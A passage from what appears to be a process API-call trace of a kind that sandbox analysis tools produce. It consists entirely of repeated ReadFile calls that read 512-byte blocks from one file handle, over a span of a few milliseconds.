lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, 
lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.240] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.240] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.240] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.240] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.240] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.240] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.240] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.240] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.241] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: 
lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.241] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.241] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.241] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.241] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.241] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.241] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.241] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.241] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.242] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, 
lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.242] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.242] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.242] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.242] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.242] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.242] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.242] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.242] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.242] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.243] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.243] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.243] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.243] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.243] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.243] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.243] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.243] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.243] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.243] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.244] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.244] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.244] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.244] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.244] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.244] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.244] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.244] ReadFile (in: hFile=0x58, 
lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.244] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.244] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.244] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.245] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.245] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.245] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.245] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.245] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.245] ReadFile 
(in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.245] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.245] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.245] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.245] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.245] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.245] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.245] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.245] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 
[0144.246] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.246] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.246] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.246] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.246] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.246] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.246] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.246] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.246] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, 
lpOverlapped=0x0) returned 1 [0144.246] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.246] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.247] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.247] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.247] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.247] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.247] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.247] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.247] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, 
lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.247] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.247] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.247] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.247] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.247] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.247] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.248] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.248] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.248] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: 
lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.248] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.248] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.248] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.248] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.248] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.248] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.248] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.248] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.248] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, 
